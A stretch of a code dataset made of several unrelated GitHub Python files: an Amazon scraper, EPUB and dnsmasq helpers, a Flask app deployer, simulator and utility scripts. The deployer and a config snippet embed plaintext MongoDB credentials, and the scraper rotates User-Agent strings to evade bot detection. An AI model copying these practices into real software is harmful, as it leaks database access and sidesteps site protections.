rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5\",\n \"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6\",\n \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\",\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20\",\n \"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52\",\n ]\n headers = {\n 'User-Agent': random.choice(USER_AGENTS_LIST),\n }\n answer = requests.get(url, headers=headers)\n res = etree.HTML(answer.text)\n return res\n\ndef index(url,que_root,que_1):\n res = response(url)\n # ul = res.xpath(\"//span[@class='zg_selected']/../following-sibling::ul[1]\")\n # lis = res.xpath(\"//ul[@class='a-unordered-list a-nostyle a-vertical a-spacing-base'][1]/li/following-sibling::ul[1]/li\")\n lis = res.xpath(\"//ul[@class='a-unordered-list a-nostyle a-vertical a-spacing-base'][1]/ul[1]//li\")\n if lis:\n for li in lis:\n au1 = 'https://www.amazon.it' + li.xpath(\".//a/@href\")[0]\n at0 = li.xpath(\".//span[contains(@class,'a-size-small')]/text()\")[0]\n at1 = 'Elettronica' + '/' + at0\n if at0 == 'Garanzie':\n continue\n que_1.put([au1,at1])\n return que_1\n\ndef get_1(que_1,que_root):\n while True:\n if not que_1.empty():\n m = que_1.get()\n que_root = find(m,que_root,que_1)\n else:\n break\n return que_root\n\n\ndef main():\n a = [('url','title'),]\n url = 'https://www.amazon.it/s/ref=sr_pg_1?rh=n%3A412609031%2Cp_n_availability%3A490214031&bbn=412609031&ie=UTF8&qid='\n global que_root,que_1\n que_root = queue.Queue()\n que_1= queue.Queue()\n que_1 = index(url,que_root,que_1)\n # que_root = get_1(que_1,que_root)\n u = que_1.qsize()\n print(u)\n for i in range(1,u+1):\n t = threading.Thread(target=get_1,args=(que_1,que_root))\n t.start()\n print(\"第%s个线程启动\"%i)\n\n for i in range(0,u):\n t.join()\n f = open('a.csv','a+',encoding='utf_8')\n while True:\n if que_root.empty():\n break\n else:\n o = que_root.get()\n a.append(o)\n for i in a:\n for j in range(2):\n if j == 0:\n f.write(i[0])\n f.write(',')\n else:\n x = i[1]\n x = x.replace(',', ',')\n f.write(x)\n f.write('\\n')\n f.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HUYANAS/Amazon---JS_Listing","sub_path":"amazon_it/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13712359593","text":"import os\nfrom os.path import join\n\nclass EpubHelper(): \n def __init__(self) -> None:\n pass \n\n XHTML_TEMPLATE = HTML = '''\n \n\n \n \n $$TITLE$$\n \n \n \n
    \n $$CONTENT$$\n
    \n \n '''\n\n MIMETYPE_TEMPLATE = \"application/epub+zip\"\n\n def bootstrap(self):\n # Based on the boilerplate seen in https://github.com/javierarce/epub-boilerplate\n book_structure = ['META-INF', 'OEBPS', join('OEBPS', 'images'), join('OEBPS', 'styles'),join('OEBPS', 'text')]\n for struct in book_structure:\n os.makedirs(join(\"__book__\", struct), exist_ok=True)\n\n key_files = [\"mimetype\", ]\n file_contents = [self.MIMETYPE_TEMPLATE]\n for file, content in key_files, file_contents:\n with open(file, \"w\", encoding=\"UTF-8\") as f:\n f.write(content)","repo_name":"RexynyN/python-learn","sub_path":"creator/epub/epubhelper.py","file_name":"epubhelper.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18413686124","text":"import ipaddress\n\nfrom pdtools.lib.output import out\n\nfrom .base import ConfigObject\nfrom .command import Command, KillCommand\n\n\ndef get_all_dhcp_interfaces(allConfigs):\n for key in allConfigs.keys():\n if key[0] == \"dhcp\":\n yield allConfigs[key].interface\n\n\nclass ConfigDhcp(ConfigObject):\n typename = \"dhcp\"\n\n options = [\n {\"name\": \"interface\", \"type\": str, \"required\": True, \"default\": None},\n {\"name\": \"leasetime\", \"type\": str, \"required\": True, \"default\": \"12h\"},\n {\"name\": \"limit\", \"type\": int, \"required\": True, \"default\": 150},\n {\"name\": \"start\", \"type\": int, \"required\": True, \"default\": 100},\n {\"name\": \"dhcp_option\", \"type\": list, \"required\": False, \"default\": \"\"}\n ]\n\n\nclass ConfigDnsmasq(ConfigObject):\n typename = \"dnsmasq\"\n\n options = [\n {\"name\": \"interface\", \"type\": list, \"required\": False, \"default\": None},\n {\"name\": \"noresolv\", \"type\": bool, \"required\": False, \"default\": False},\n {\"name\": \"server\", \"type\": list, \"required\": False, \"default\": None}\n ]\n\n def apply(self, allConfigs):\n commands = list()\n\n # visibleName will be used in choosing file names for this dnsmasq\n # instance, must be unique if there are multiple dnsmasq instances\n visibleName = self.internalName\n\n if self.interface is None:\n interfaces = get_all_dhcp_interfaces(allConfigs)\n else:\n interfaces = self.interface\n\n leaseFile = \"{}/dnsmasq-{}.leases\".format(\n self.manager.writeDir, visibleName)\n pidFile = \"{}/dnsmasq-{}.pid\".format(\n self.manager.writeDir, visibleName)\n outputPath = \"{}/dnsmasq-{}.conf\".format(\n self.manager.writeDir, visibleName)\n\n with open(outputPath, \"w\") as outputFile:\n outputFile.write(\"#\" * 80 + \"\\n\")\n outputFile.write(\"# dnsmasq configuration file generated by \"\n \"pdconfd\\n\")\n outputFile.write(\"# Source: {}\\n\".format(self.source))\n outputFile.write(\"# Section: {}\\n\".format(str(self)))\n outputFile.write(\"#\" * 80 + \"\\n\")\n outputFile.write(\"\\n\")\n outputFile.write(\"dhcp-leasefile={}\\n\".format(leaseFile))\n\n if self.noresolv:\n outputFile.write(\"no-resolv\\n\")\n\n if self.server:\n for server in self.server:\n outputFile.write(\"server={}\\n\".format(server))\n\n # TODO: Bind interfaces allows us to have multiple instances of\n # dnsmasq running, but it would probably be better to have one\n # running and reconfigure it when we want to add or remove\n # interfaces. It is not very disruptive to reconfigure and restart\n # dnsmasq.\n outputFile.write(\"\\n\")\n outputFile.write(\"except-interface=lo\\n\")\n outputFile.write(\"bind-interfaces\\n\")\n\n for intfName in interfaces:\n interface = self.lookup(allConfigs, \"interface\", intfName)\n outputFile.write(\"\\n\")\n outputFile.write(\"# Options for section interface {}\\n\".\n format(interface.name))\n outputFile.write(\"interface={}\\n\".format(\n interface.config_ifname))\n\n network = ipaddress.IPv4Network(u\"{}/{}\".format(\n interface.ipaddr, interface.netmask), strict=False)\n\n dhcp = self.lookup(allConfigs, \"dhcp\", intfName)\n\n # TODO: Error checking!\n firstAddress = network.network_address + dhcp.start\n lastAddress = firstAddress + dhcp.limit\n\n outputFile.write(\"\\n\")\n outputFile.write(\"# Options for section dhcp {}\\n\".\n format(interface.name))\n outputFile.write(\"dhcp-range={},{},{}\\n\".format(\n str(firstAddress), str(lastAddress), dhcp.leasetime))\n\n # Write options sections to the config file.\n if dhcp.dhcp_option:\n for option in dhcp.dhcp_option:\n outputFile.write(\"dhcp-option={}\\n\".format(option))\n\n cmd = [\"/apps/bin/dnsmasq\", \"--conf-file={}\".format(outputPath),\n \"--pid-file={}\".format(pidFile)]\n commands.append((self.PRIO_START_DAEMON, Command(cmd, self)))\n\n self.pidFile = pidFile\n return commands\n\n def revert(self, allConfigs):\n commands = list()\n\n commands.append((-self.PRIO_START_DAEMON, \n KillCommand(self.pidFile, self)))\n\n return commands\n","repo_name":"damouse/AnotherParadrop","sub_path":"python/paradrop/backend/pdconfd/config/dhcp.py","file_name":"dhcp.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11346658010","text":"\"\"\"\nThis file contains the core classes and functions of the project.\n\"\"\"\n\nfrom glob import glob\nimport datetime\nimport os\nimport platform\nimport logging\nFORMAT = '[%(asctime)s]-[%(funcName)s]-[%(levelname)s] - %(message)s'\nlogging.basicConfig(\n level=logging.INFO,\n format=FORMAT\n)\n\n\nclass Utilities:\n def __init__(self):\n self.name = \"Core\"\n self.log_folder_name: str = \"captured_logs\"\n\n def get_desktop_path(self) -> str:\n \"\"\"Gets the path to the Desktop directory regardless\n of the OS (Windows, Linux, Mac). On windows, the path the path to\n Desktop might be under OneDrive\n Returns:\n str: The path to the Desktop directory.\n \"\"\"\n # list of paths to the Desktop directory (Windows, Linux, Mac)\n list_of_desktop_paths: list = glob(\n os.path.expanduser(\"~//*Desktop//\"),\n recursive=True\n )\n return os.path.normpath(\n list_of_desktop_paths[0] if len(list_of_desktop_paths) == 1\n else os.path.join(os.path.expanduser(\"~\"), \"Desktop\")\n )\n\n def get_os(self) -> str:\n \"\"\"\n Gets the OS that the program is running on.\n\n Returns:\n str: The OS that the program is running on. If the OS is not\n recognized, then return \"Unknown OS\".\n \"\"\"\n system: str = platform.system().lower()\n\n os_mapping: dict = {\n 'linux': 'Linux',\n 'darwin': 'MacOS',\n 'windows': 'Windows',\n } # maps the OS to the OS name that we want to display to the user\n\n return os_mapping.get(system, 'Unknown OS')\n\n def normalize_path(self, new_directory: str) -> str:\n \"\"\"Set the new directory path to the normalized path\n of the new directory.\n Args:\n new_directory (str): The new directory to set.\n \"\"\"\n return os.path.normpath(new_directory)\n\n def generate_timestamp_YYYY_MM_DD_T_MM(self) -> str:\n \"\"\"Generate a timestamp in the format of YYYYMMDDTHHMM\n\n Example:\n Year Month Day Time Hour Minute Second (e.g 20210101T120000)\n Returns:\n str: The timestamp.\n \"\"\"\n return datetime.datetime.now().strftime(\"%Y%m%dT%H%M\")\n\n def generate_path_to_output_directory_folder(self) -> str:\n \"\"\"\n Generate the path to the output directory folder.\n Example:\n captured_logs_20210101T120000\n \"\"\"\n timestamp: str = self.generate_timestamp_YYYY_MM_DD_T_MM()\n folder_name: str = f\"{self.log_folder_name}_{timestamp}\"\n path: str = os.path.join(self.get_desktop_path(), folder_name)\n logging.info(f\"Path to output directory folder: {path}\")\n return path\n\n def create_output_directory_folder(self) -> None:\n \"\"\"Create the output directory folder if it does not exist.\n Returns:\n str: The path to the output directory folder.\n \"\"\"\n # create the output directory folder if it does not exist\n if not os.path.exists(\n self.generate_path_to_output_directory_folder()\n ):\n logging.info(\n f\"Creating output directory folder: \"\n f\"{self.generate_path_to_output_directory_folder()}\"\n )\n os.makedirs(self.generate_path_to_output_directory_folder())\n else:\n logging.info(\n f\"Output directory folder already exists: \"\n f\"{self.generate_path_to_output_directory_folder()}\"\n )\n","repo_name":"matt2ology/system-log-capture","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4606978679","text":"from functions import *\nimport sys\n\nglobal file\nglobal index\nindex = 0\n\nnumber_of_landings_index = 661\nlanding_config_index = 664\nccelig_index = 858\nfhcelig_index = 988\nrhcelig_index = 1118\nhospelig_index = 1248\niox_index = 1555\ni4o_index = 1558\naiox_index = 1561\nspare1_index = 7878\neof_index = 8753\n\ndef write_filler(sim_content,index,end_index):\n\tfor x in range(index,end_index):\n\t\tline_write(sim_content[x])\n\ndef write_top_landing(asm_content):\n\tbottom_index = asm_content.index(\"BOTTOM:\")\t\n\ttop_floor = remove_prefix(asm_content[bottom_index + 2],\"DB\")\n\t\n\tif is_hex(top_floor):\n\t\tline_write('Value= ' + str(int(remove_suffix(top_floor,\"H\"),16)+1))\n\telse:\n\t\tline_write('Value= ' + str(int(top_floor) + 1))\n\ndef write_landing_config(asm_content):\n\tnumber_of_landings = top_floor_sim(asm_content)\n\tfor x in range(number_of_landings):\n\t\tlanding = str(x + 1)\n\t\tline_write('Value Height ' + landing + ' = 10')\n\t\tline_write('Value ' + landing + ' F = True')\n\t\tline_write('Value ' + landing + ' R = False')\n\ndef write_ccelig(asm_content):\n\tnumber_of_landings = top_floor_sim(asm_content)\n\tfor x in range(number_of_landings):\n\t\tlanding = str(x + 1)\n\t\tline_write('Value ' + landing + ' F = True')\n\t\tline_write('Value ' + landing + ' R = False')\t\t\n\ndef write_inputs(sim_inputs):\n\tspare_number = 1\n\tfor x in range(8):\n\t\tfor y in range(8):\n\t\t\tif sim_inputs[x][7-y] == 0:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tline_write('[SpareSwComboBox' + str(spare_number))\n\t\t\t\tline_write('Value= ' + sim_inputs[x][7-y])\n\t\t\t\tline_write('')\n\t\t\t\tspare_number += 1\n\t\t\t\t\ndef write_iox_boards(asm_content):\n\tiox_boards_index = asm_content.index(\"LOBBY:\") + 40\n\tline_write('Value= ' + str(remove_suffix(remove_prefix(asm_content[iox_boards_index],\"DB\"),\"H\")[-1:]))\n\ndef write_i4o_boards(asm_content):\n\tiox_boards_index = asm_content.index(\"LOBBY:\") + 40\n\tline_write('Value= ' + str(remove_suffix(remove_prefix(asm_content[iox_boards_index],\"DB\"),\"H\")[-2:-1]))\n\ndef line_write(text):\n\tglobal index\n\tglobal file\n\tfile.write(text + '\\n')\n\tindex += 1\n\t\nfilestring = \"G:/Software/Product/\" + str(sys.argv[2]) + \"/\" + str(sys.argv[1]) + \".asm\"\n\nwith open(filestring,\"r\") as file:\n\tasm_content = file.readlines()\nasm_content = [x.strip() for x in asm_content]\nfor x in range(len(asm_content)):\n\tasm_content[x] = remove_comments(asm_content[x])\nasm_content = list(filter(None,asm_content))\n\nwith open(\"sim_base.sdf\",\"r\") as f:\n\tsim_content = f.readlines()\nsim_content = [x.strip() for x in sim_content]\n\nsim_inputs = sim_inputs(asm_content)\n\n\nfilewritestring = \"C:/Simulator/\" + str(sys.argv[1]) + \".sdf\"\nfile = open(filewritestring,\"w\")\n\nwrite_filler(sim_content,index,number_of_landings_index)\nwrite_top_landing(asm_content)\nwrite_filler(sim_content,index,landing_config_index)\nwrite_landing_config(asm_content)\nwrite_filler(sim_content,index,ccelig_index)\nwrite_ccelig(asm_content)\nwrite_filler(sim_content,index,iox_index)\nwrite_iox_boards(asm_content)\nwrite_filler(sim_content,index,i4o_index)\nwrite_i4o_boards(asm_content)\nwrite_filler(sim_content,index,spare1_index)\nwrite_inputs(sim_inputs)\nwrite_filler(sim_content,index,eof_index)\n","repo_name":"ballj19/mce","sub_path":"mods/mods/bin/Helpers/simbuilder.py","file_name":"simbuilder.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24699024462","text":"from asyncio.log import logger\nimport logging\nfrom platform import node\nimport requests\nfrom flask import Flask, jsonify, request\nimport subprocess\nfrom time import sleep\nimport pymongo\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\n\n# from rich import print\n\nclient = \"mongodb://ias_mongo_user:ias_password@cluster0-shard-00-00.doy4v.mongodb.net:27017,cluster0-shard-00-01.doy4v.mongodb.net:27017,cluster0-shard-00-02.doy4v.mongodb.net:27017/ias_database?ssl=true&replicaSet=atlas-ybcxil-shard-0&authSource=admin&retryWrites=true&w=majority\"\ndb_name = \"ias_database\"\nclient = pymongo.MongoClient(client)\nmydb = client[db_name]\nservices_config_coll = mydb[\"services_config\"]\n\napp = Flask(__name__)\n\n\napp.config['SECRET_KEY'] = \"SuperSecretKey\"\napp.config['MONGO_URI'] = \"mongodb://ias_mongo_user:ias_password@cluster0-shard-00-00.doy4v.mongodb.net:27017,cluster0-shard-00-01.doy4v.mongodb.net:27017,cluster0-shard-00-02.doy4v.mongodb.net:27017/ias_database?ssl=true&replicaSet=atlas-ybcxil-shard-0&authSource=admin&retryWrites=true&w=majority\"\n\n\nmongo_db = PyMongo(app)\ndb = mongo_db.db\n\n\n# localhost_ip_address = \"172.17.0.1\"\n\npub_ip = requests.get(\"http://api.ipify.org\").content.decode()\nlocalhost_ip_address = pub_ip\n# localhost_ip_address = \"localhost\"\n\n\n\n\n###################################################################\n\n@app.route('/run', methods=[\"POST\"])\ndef runImg():\n\n # this request will always be POST request\n \n\n logging.warning(\"got request from scheduler\")\n recieved_json = request.get_json()\n model_port=recieved_json['port_num']\n \n \n\n logging.warning(f\"recieved_json = {recieved_json}\")\n\n\n service_ports = services_config_coll.find()\n node_service_port = service_ports[0]['node_service']\n\n node_manager_url = f\"http://{localhost_ip_address}:\" +str(node_service_port) + \"/getNode\"\n logging.warning(f\"sending request to node manager @ \\n{node_manager_url}\")\n logging.warning(f\"length = {len(node_manager_url)}\")\n resp = requests.get(\n node_manager_url\n ).content.decode()\n\n node_endpoint = resp\n\n #url = req['url']\n logging.warning(f\"got back from node manager, response = {node_endpoint}\")\n recieved_json['url'] = node_endpoint\n actual_ip = node_endpoint.split(\":\")[1].replace(\"/\", \"\")\n logging.warning(f'splitted = {node_endpoint.split(\":\")[1].replace(\"/\", \"\")}')\n \n\n #######################\n #######################\n #######################\n\n if \"schedule_type\" in recieved_json.keys() and recieved_json['schedule_type'] == 1:\n # MODEL DEPLOY REQUEST\n model_name=recieved_json['model_name']\n logger.warning(f\"GOT MODEL shceduling reeust {recieved_json['schedule_type'] == 1}\")\n recieved_json['fpath'] = 'model_repo/' + recieved_json['model_name']\n logging.warning(\"hello, {recieved_json}\")\n \n logging.warning(f\"node_endpoint = {node_endpoint}\")\n\n ##\n url_to_request = f\"{node_endpoint}/runapp\"\n logging.warning(f\"url_to_request = {url_to_request}\")\n res = requests.post(url=url_to_request,\n json=recieved_json).json()\n \n logging.warning(f\"res = {res}\")\n \n recieved_json['container_name'] = res['container_name']\n recieved_json['model_name'] = model_name\n recieved_json['vm_ip'] = actual_ip\n recieved_json['model_port'] = model_port\n recieved_json['_id'] = res['container_name']\n\n logging.warning(f\"recieved_json['container_name'] = {recieved_json['container_name']}\")\n # recieved_json[\"config_id\"] = recieved_json[\"config_id\"])\n try:\n db.deployer_log.insert_one(recieved_json)\n \n except Exception as er:\n logging.warning(er)\n pass\n \n\n else:\n # APP DEPLOY REQUEST\n app_name=recieved_json['app_name']\n recieved_json['fpath'] = 'application_repo/' + recieved_json['app_name']\n logging.warning(\"hello, {recieved_json}\")\n\n actual_config = db.configuration.find_one(\n {\"_id\": ObjectId(recieved_json[\"config_id\"])}\n )\n\n logging.warning(f\"actual_config = {actual_config}\")\n\n recieved_json[\"config\"] = actual_config\n\n if '_id' in recieved_json[\"config\"]:\n del recieved_json[\"config\"]['_id']\n\n # SENDING REQUEST TO NODE\n logging.warning(f\"node_endpoint = {node_endpoint}\")\n\n recieved_json['schedule_type'] = 2\n\n url_to_request = f\"{node_endpoint}/runapp\"\n logging.warning(f\"url_to_request = {url_to_request}\")\n res = requests.post(url=url_to_request,\n json=recieved_json).json()\n \n recieved_json['container_name'] = res['container_name']\n recieved_json['_id'] = f\"{app_name}_{recieved_json['config_id']}\"\n logging.warning(f\"recieved_json['container_name'] = {recieved_json['container_name']}\")\n # recieved_json[\"config_id\"] = recieved_json[\"config_id\"])\n \n \n \n try:\n db.deployer_log.insert_one(recieved_json)\n except Exception as er:\n logging.warning(er)\n pass\n \n return 'Requests to the node for deploying'\n\n\n@app.route('/kill', methods=[\"POST\"])\ndef killImg():\n logging.warning(\"In KILL request\")\n if request.method == 'POST':\n received_json = request.get_json()\n if received_json is None:\n logging.warning(\"Go GOa GOne\\n\\n\")\n logging.warning(\"Go GOa GOne\\n\\n\")\n logging.warning(\"Go GOa GOne\\n\\n\")\n logging.warning(\"Go GOa GOne\\n\\n\")\n\n logging.debug(f\"received_json = {received_json}\")\n # data = db.deployer_log.find_one(\n # {\"app_name\": received_json['app_name']})\n\n configuration_document = db.deployer_log.find_one(\n {\"config_id\": received_json[\"config_id\"]})\n container_name_to_kill = configuration_document[\"container_name\"]\n url_of_node = configuration_document[\"url\"]\n\n # url = received_json['url']\n logging.debug(\"got KILL request\")\n logging.debug(\"got KILL request\")\n logging.debug(\"got KILL request\")\n logging.debug(\"got KILL request\")\n logging.warning(f\"recieved_json = {received_json}\")\n # logging.warning(f\"data = {received_json}\")\n db.deployer_log.delete_one({'app_name': received_json['app_name']})\n res = requests.post(url=url_of_node + \"/killapp\",\n json={'container_name': container_name_to_kill})\n logging.warning(res.content)\n\n return \"Killed\"\n\n\nif __name__ == '__main__':\n\n service_ports = services_config_coll.find()\n\n deployer_service_port = service_ports[0]['deployer_service']\n\n app.run(debug=True,use_reloader=False, host='0.0.0.0', port=deployer_service_port)\n","repo_name":"Adigoo/IAS-Project-Group-5","sub_path":"deployer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43190159776","text":"def problem_1(num_list, total = 2020):\n for num in num_list:\n if (total-num) in num_list:\n return num * (total-num)\n return None\n\ndef problem_2(num_list):\n for num1 in num_list:\n for num2 in num_list:\n if (2020-num1-num2) in num_list:\n return num1 * num2 * (2020-num1-num2)\n return None\n\ndef recursive(num_list, rounds, total = 2020):\n if rounds == 1:\n if total in num_list:\n return total\n else:\n return None\n start = -1\n end = len(num_list)\n for num in num_list:\n start += 1\n solution = recursive(num_list[start:end], rounds-1, total-num)\n if solution:\n return num * solution\n return None\n\n\nwith open('input.txt') as file:\n index = 0\n lines = file.readlines()\n nums = lines\n for line in nums:\n nums[index] = int(lines[index])\n index += 1\n\n print('Problem 1: ', problem_1(nums))\n print('Problem 2: ', problem_2(nums))\n\n print('Problem 1 recursive: ', recursive(nums, 2))\n print('Problem 2 recursive: ', recursive(nums, 3))\n","repo_name":"mwnewm/AdventOfCode","sub_path":"2020/dec_01/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32059294770","text":"\"\"\"\nPersonalidades para ia.cecil: Robô também é gente?\n\nia.cecil\n\nCopyleft 2020-2023 Iuri Guilherme \n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n\"\"\"\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n### Personalidade padrão do @mate_obot\nfrom ...aiogram_bot.callbacks import (\n command_callback,\n message_callback,\n)\nfrom ....models import Iteration\nfrom ..default import (\n start,\n help,\n info,\n portaria,\n welcome,\n furhat_contains_iterations as furhat_contains_iterations_default,\n furhat_endswith_iterations,\n furhat_startswith_iterations,\n add_handlers as add_default_handlers,\n)\n\ntry:\n from instance.personalidades.matebot import random_texts\nexcept Exception as e:\n logger.debug(f\"random_texts em instance não encontrada para {__name__}\")\n # ~ logger.exception(e)\n try:\n from . import random_texts\n except Exception as e1:\n logger.debug(f\"no random_texts at all for {__name__}\")\n # ~ logger.exception(e1)\n\nasync def add_handlers(dispatcher):\n await add_default_handlers(dispatcher)\n ## BOFH\n @dispatcher.message_handler(\n commands = ['bofh'],\n )\n async def bofh_callback(message):\n await message_callback(message, ['personalidades', 'matebot',\n 'bofh', message.chat.type])\n command = await message.reply(await random_texts.bofh())\n await command_callback(command, ['personalidades', 'matebot',\n 'bofh', message.chat.type])\n\n## Furhat\nasync def furhat_desculpa(config, message):\n return await random_texts.bofh()\n\nasync def furhat_contains_iterations():\n return (await furhat_contains_iterations_default()) + [\n Iteration(text = subtext, callback = furhat_desculpa,\n ) for subtext in [\n 'não tá funcionando',\n 'internet tá ruim',\n 'wi-fi tá ruim',\n 'not working',\n ]\n ]\n","repo_name":"iuriguilherme/iacecil","sub_path":"src/iacecil/controllers/personalidades/matebot/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"2374004209","text":"from context import Context\n\n\ndef delete_dax_table(dyn_resource=None):\n \"\"\"\n Deletes the demonstration table.\n :param dyn_resource: Either a Boto3 or DAX resource.\n \"\"\"\n table_name = Context.dynamodb_table\n all_tables = []\n if dyn_resource is None:\n dynamodb = Context.dynamodb_local\n for table in dynamodb.tables.all():\n all_tables.append(table.name)\n if table_name not in all_tables:\n print(f\"Table does not exist\")\n return False\n\n table = dynamodb.Table(table_name)\n table.delete()\n\n print(f\"Deleting {table.name}...\")\n table.wait_until_not_exists()\n print(f\"Deleting {table.name} complete\")","repo_name":"Elvis-aws/Python-API-Framework","sub_path":"API/deleteTable.py","file_name":"deleteTable.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74661412963","text":"import threading\n\nport = 5000\npid = 1\n\nip_list = ['191.52.7.28', '191.52.7.27', '191.52.7.26']\n\nlock = threading.Lock()\n\n# (nome do evento, contador relógio lógico, pid)\nevent_list = [] \nevent_list_global = [] \nevent_count = 0\nevents_queue = []","repo_name":"Lima001/BCC-Sistemas-Distribuidos","sub_path":"Ordenacao de Processos/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9495787455","text":"'''\r\nPython Firebase Course for\r\nBeginners\r\nhttps://codeloop.org/python-firebase-course-for-beginners/\r\n'''\r\nimport pyrebase\r\n\r\nconfig = {\r\n\"apiKey\": \"AIdkIZxU\",\r\n\"authDomain\": \"esp32-aleatorios.firebaseapp.com\",\r\n\"databaseURL\": \"https://esp3db.firebaseio.com\",\r\n\"projectId\": \"esp32-aleatorios\",\r\n\"storageBucket\": \"esp32-aleatorios.appspot.com\",\r\n\"messagingSenderId\": \"197640\",\r\n\"appId\": \"1:19740:web:160bd9a125e895\",\r\n\"measurementId\": \"G-G3Z1\"\r\n}\r\n#create authetication\r\nfirebase = pyrebase.initialize_app(config)\r\n#accesing database in firebase\r\ndb = firebase.database()\r\ndata = {\"name\":\"Ignacio Altamirano\"}\r\ndata1 = {\"job\":\"Periodista\"}\r\ndb.child(\"users\").push(data)\r\ndb.child(\"users\").push(data1)\r\nprint(\"Data added to real time database \")\r\n","repo_name":"etorresr/IoT_Python","sub_path":"ejer2.py","file_name":"ejer2.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"16507455292","text":"from DataModelDict import DataModelDict as DM\n\nfrom .. import PotentialGenerator\n\n__all__ = ['LIBRARY']\nclass LIBRARY(PotentialGenerator):\n def __init__(self, libfile=None, paramfile=None,\n id=None, key=None, pot_id=None, pot_key=None,\n units='metal', atom_style='atomic', pair_style='meam',\n pair_style_terms=None,\n elements=None, masses=None, symbols=None):\n \n # Set default values for format\n\n # Call PotentialGenerator's init\n PotentialGenerator.__init__(self, id=id, key=key, pot_id=pot_id, pot_key=pot_key,\n units=units, atom_style=atom_style, pair_style=pair_style,\n pair_style_terms=None,\n elements=elements, masses=masses, symbols=symbols)\n \n # Set format-specific parameters\n if libfile is not None:\n self.libfile = libfile\n else:\n raise ValueError('libfile must be given')\n if paramfile is not None:\n self.paramfile = paramfile\n else:\n self.paramfile = 'NULL'\n \n def buildpaircoeff(self):\n paircoeff = DM()\n paircoeff.append('term', DM([('file', self.libfile)]))\n paircoeff.append('term', DM([('option', self.symbollist)]))\n paircoeff.append('term', DM([('file', self.paramfile)]))\n paircoeff.append('term', DM([('symbols', 'True')]))\n \n return paircoeff","repo_name":"lmhale99/iprPy_diatom_scan","sub_path":"iprPy/tools/potential_generator_formats/LIBRARY.py","file_name":"LIBRARY.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16396931347","text":"# vowels = ['a', 'e', 'i', 'o', 'u']\n# # word = input(\"Provide a word to search for vowels: \")\n# word = \"i have to know the truth\"\n# found = {'a': 0,'u': 0, 'e': 0,'i': 0,'o': 0}\n# for letter in word:\n# if letter in vowels:\n# # if letter not in found:\n# # found.append(letter)\n# found[letter] += 1\n# # for vowel in found:\n# # print(vowel)\n# print(found)\n# print(sorted(found.items()))\n# for k in found:\n# print(k, 'was found',found[k],'time(s).')\n# for k,v in sorted(found.items()):\n# print(k, 'was found',v,'time(s).')\n\n#\n# def findvowels(word:str)->set:\n# \"\"\"try this out\"\"\"\n# vowels = set('aeiou')\n# found = vowels.intersection(word)\n# return ''.join(found)\n#\n#\n# print(findvowels(\"word is a word\"))\n#\n# help(findvowels)\n\nimport vsearch\n\nfound = vsearch.search4letters('this is not a sentence.')\nfor everything in found:\n print(everything)","repo_name":"aiolosluf/python","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38246198013","text":"from __future__ import annotations\n\nfrom abc import abstractmethod\nfrom contextlib import AbstractContextManager, contextmanager\nfrom types import TracebackType\nfrom typing import Iterator, Optional, Type\n\nfrom ._boot_mode import BootMode\n\n\nclass AbstractBootModeControl(AbstractContextManager[\"AbstractBootModeControl\"]):\n \"\"\"ABC for boot mode control.\"\"\"\n\n @property\n @abstractmethod\n def default_mode(self) -> BootMode:\n \"\"\"Return the default boot mode.\n\n When used as 